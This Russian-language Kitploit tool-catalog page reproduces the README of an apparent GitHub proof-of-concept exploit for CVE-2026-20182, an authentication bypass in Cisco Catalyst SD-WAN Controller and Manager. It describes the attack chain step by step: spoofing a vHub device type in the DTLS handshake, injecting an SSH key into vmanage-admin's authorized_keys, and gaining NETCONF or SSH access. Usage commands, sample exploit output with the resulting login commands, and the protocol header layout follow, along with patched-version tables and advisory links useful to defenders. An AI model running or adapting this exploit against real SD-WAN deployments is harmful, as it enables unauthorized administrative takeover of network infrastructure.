Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC — Cisco Catalyst SD-WAN Controller / Manager: обход аутентификации (CVSS 10.0) | Kitploit
Инструменты/GitHubGitHub/portbuster1337/cve-2026-20182
Фреймворки для эксплойтовАнализ уязвимостейЭксплуатацияСетевая безопасностьТестирование на ПроникновениеБезопасность облачных средАутентификацияRed Teaming
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC — Cisco Catalyst SD-WAN Controller / Manager: обход аутентификации (CVSS 10.0)

Репозиторий
333 месяцев назадЕщё не проверено
Сайт

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-20182 — Обход аутентификации Cisco Catalyst SD-WAN Controller / Manager

Эксплойт класса proof-of-concept для CVE-2026-20182, критического (CVSS 10.0) обхода аутентификации в службе vdaemon DTLS (UDP/12346) на Cisco Catalyst SD-WAN Controller (vSmart) и Manager (vManage).

Раскрытие: 14 мая 2026 года, Rapid7 (Stephen Fewer & Jonah Burgess)
CISA KEV: Добавлено 14 мая 2026 года (Чрезвычайная директива 26-03)
CVSS: 10.0 — CWE-287: Некорректная аутентификация

Уязвимость

Служба vdaemon использует многофазное DTLS-рукопожатие для аутентификации пиров на плоскости управления. Функция vbond_proc_challenge_ack() реализует проверку сертификатов в зависимости от типа устройства, но для типа устройства 2 (vHub) отсутствует путь проверки. Отправка CHALLENGE_ACK с device_type=2 заставляет функцию пройти через все условные проверки и безусловно установить peer->authenticated = 1.

Не требуются ни действительные учетные данные, ни сертификат, подписанный CA, ни знание о развертывании SD-WAN.

Что делает эксплойт

  1. Устанавливает DTLS 1.2-соединение со службой vdaemon цели (UDP/12346)
  2. Получает сообщение CHALLENGE (msg_type=8)
  3. Отправляет CHALLENGE_ACK, представляясь vHub (device_type=2) → пир помечается как аутентифицированный
  4. Отправляет HELLO (msg_type=5) → пир переходит в состояние UP
  5. Внедряет открытый ключ SSH в /home/vmanage-admin/.ssh/authorized_keys через MSG_VMANAGE_TO_PEER (msg_type=14)
  6. Предоставляет доступ к NETCONF (SSH TCP/830) или SSH-доступ (TCP/22) под пользователем vmanage-admin

Использование

root@kitploit:~
python3 cve-2026-20182.py -t <target> [options]

Параметры

АргументОписание
-t, --targetIP-адрес или имя хоста цели
--portUDP-порт vdaemon (по умолчанию: 12346)
--key-fileПуть к существующему открытому ключу SSH для внедрения (необязательно)
--netconfПроверить эксплуатацию, подключившись к NETCONF через SSH

Примеры

root@kitploit:~
# Generate a fresh key pair and exploit
python3 cve-2026-20182.py -t 192.168.1.100

# Use an existing public key
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# Exploit and verify via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf

Вывод

root@kitploit:~
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]

Затронутые версии

РелизИсправленная версия
< 20.9Перейти на поддерживаемый релиз
20.920.9.9.1
20.1020.12.7.1
20.1120.12.7.1
20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
20.1320.15.5.2
20.1420.15.5.2
20.1520.15.4.4 / 20.15.5.2
20.1620.18.2.2
20.1820.18.2.2
26.1.126.1.1.1

Ссылки на исследования

  • Rapid7 (Original Disclosure): CVE-2026-20182: Критический обход аутентификации в Cisco Catalyst SD-WAN Controller — Полный технический анализ, декомпилированный код и детали протокола от Stephen Fewer и Jonah Burgess
  • Cisco Security Advisory: cisco-sa-sdwan-rpa2-v69WY2SW — Консультация производителя с исправленными версиями
  • CISA KEV: CVE-2026-20182 — Чрезвычайная директива 26-03 (устранение до 17 мая 2026 года)
  • NVD: CVE-2026-20182 — Запись в Национальной базе данных уязвимостей
  • Rapid7 Metasploit Module: cisco_sdwan_vhub_auth_bypass — Вспомогательный модуль во фреймворке Metasploit
  • BleepingComputer: Cisco предупреждает о новой критической уязвимости SD-WAN, эксплуатируемой в zero-day атаках
  • Tenable: FAQ о продолжающейся эксплуатации уязвимостей Cisco SD-WAN
  • Cisco Talos: Угрозовый актор UAT-8616, которому приписывается эксплуатация этой уязвимости в реальных атаках

Технические детали

Заголовок протокола vdaemon имеет размер 12 байт:

СмещениеРазмерПолеПримечания
01msg_typeМладший полубайт = тип, старший полубайт = версия
11device_infoСтарший полубайт = device_type, младший полубайт = flags
21flagsСтандартное значение 0xA0
31paddingВсегда 0x00
4-74domain_idBig-endian uint32
8-114site_idBig-endian uint32

Типы устройств: 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

Требования

  • Python 3.7+
  • openssl CLI (для DTLS-транспорта)
  • библиотека cryptography (pip install cryptography)

Отказ от ответственности

Данный эксплойт предназначен исключительно для авторизованных операций red team, пентеста и исследований безопасности в отношении систем, на которые у вас есть явное письменное разрешение. Несанкционированное использование незаконно.

Скачать инструмент